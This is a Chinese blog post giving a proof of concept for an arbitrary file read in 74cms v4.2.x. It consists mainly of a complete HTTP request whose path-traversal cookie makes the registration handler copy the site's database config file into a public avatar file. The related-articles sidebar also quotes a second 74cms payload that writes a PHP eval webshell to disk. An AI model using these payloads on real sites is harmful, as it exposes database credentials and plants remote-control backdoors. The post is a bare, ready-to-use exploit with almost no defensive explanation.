74cms v4.2.126-任意文件读取漏洞

最新推荐文章于 2024-03-04 10:33:09 发布
最新推荐文章于 2024-03-04 10:33:09 发布
阅读量581 收藏
点赞数
分类专栏: 漏洞 文章标签: php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50887021/article/details/120385396
版权

poc

POST /74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=Home&c=Members&a=register HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=default
Cookie: members_bind_info[temp_avatar]=…/…/…/…/Application/Common/Conf/db.php;members_bind_info[type]=qq;members_uc_info[password]=123456;members_uc_info[uid]=1;members_uc_info[username]=tttttt;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
X-Requested-With: XMLHttpRequest

reg_type=2&utype=2&org=bind&ucenter=bind

在这里插入图片描述

生成一个文件

D:\phpstudy001\PHPTutorial\WWW\74cms_Home_Setup_v4.2.111\74cms_v4.2.111\upload\data\upload\avatar\2109\19\05f4fc5cd2b23846bd6bd126c3133231.php

在这里插入图片描述

D:\phpstudy001\PHPTutorial\WWW\74cms_Home_Setup_v4.2.111\74cms_v4.2.111\upload\Application\Common\Conf\db.php

在这里插入图片描述

blank er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的复现过程。
Ares-X#VulWiki#74cms v4.2.126-通杀sql注入1
07-25
4, 如果是本地环境的话,会提示 域名不合法升级失败,这个问题很好解决5,搜索文件74cms\upload\Application\Admin\Controll
麻将计分器:简单的微信小程序开发
acheding的博客
10-18 3240
本文从前后端两个方面介绍了一个简单的麻将计分器微信小程序的准备工作以及代码的编写,并以动图的形式展示了样例,提供了部分代码供参考。
oschina android app 2.2.1 源码收藏
yanguz的专栏
08-18 773
package net.oschina.app.ui; import java.lang.ref.WeakReference; import net.oschina.app.R; import net.oschina.app.base.BaseActivity; import net.oschina.app.base.BaseFragment; import net.osch...
74cms漏洞寻找
最新发布
wanderdjjs的博客
03-04 248
这也就意味着该靶场存在xss漏洞,显示结果说明是过滤了 测试是否能显示网站cookie值。2.打开浏览器,在界面输入:IP/74cms/upload/install。1.安装完小皮之后,打开根目录,将74cms文件拖进根目录。注册结束之后进入靶场内部,我们可以选择前端和后端。这里我们选择后端,输入之前的用户名密码 进入。# 仅仅是娱乐所写,文章不够严谨,请勿见怪。1.在个人区域界面,点击搜索区域。会显示本机的IP地址和token值。3.正常我们输入是没有反馈的。这也就意味着存在文件包含漏洞
74cms
qq_52469895的博客
04-11 1630
下载好源码 php网站源码下载_php招聘网站源码_php网站模版_骑士cms人才系统 然后安装,安装好之后 发送poc: http://127.0.0.1/74cms//index.php?m=home&a=assign_resume_tpl POST: variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n
74cms 骑士人才系统 v4.2.66 正式版
12-30
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
74cms 骑士人才系统 v4.2.111 正式版
10-13
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
""" 声明: 本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io 注: 1. uid+time() 构成图片名,由于网路问题 time() 会出现一定偏差导致无法的到文件的正确名称 2. 因本工具没有设置爆破 time() 功能,故多运行几次本工具大致可以,反之,需要爆破请求的时间戳 """
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
03-25
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
骑士PHP人才系统(74CMS)源代码 v3.0
11-09
 骑士CMS-PHP人才系统源码,功能模块专业,系统以招聘求职模块与诸多实用辅助模块组成,专业、强大、实用、易用。在布局上科学严谨,给用户赏心悦目的视觉感受,而且程序开源免费、安全稳定,拥有WEB2.0新技术使系统拥有一流的用户体验。
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74cms 骑士人才系统 v4.2.3 正式版
12-01
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
74cms 4.2.3模板
07-08
74cms4.2.3模板,大家测试用,如果其他需要,可以更贴留言,共同讨论研究
使用phpStudy搭建74cms(详)
Alashan12的博客
03-19 4704
自行下载phpStudy和74cms压缩包 建议在虚拟机上下载安装,部分版本的phpStudy有后门 解压phpStudy到C盘目录下(虚拟机Windows7) 打开phpStudy.exe 弹出的对话框或页面关闭即可 启动phpStudy,Apache和MySQL显示绿色,若为红色请自行调试 浏览器访问本机地址127.0.0.1 出现phpStudy探针 查看虚拟机IP 宿主机访问虚拟机IP出现phpStudy探针界面 解压74cms压...
74cmsSEv3.4.1存在任意文件读取漏洞(CVE-2022-26271)
qq_69432323的博客
07-23 177
74cmsSEv3.4.1存在任意文件读取漏洞
dedecms-v5.7.95-utf8.zip
12-19
这个压缩包包含了dedecms v5.7.95版本的所有程序文件和相关资源,采用了UTF-8编码格式。 这个CMS软件是基于PHP+MySQL开发的,并且支持插件扩展。它具有良好的界面友好性和灵活性,可以帮助用户快速建立自己的网站。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值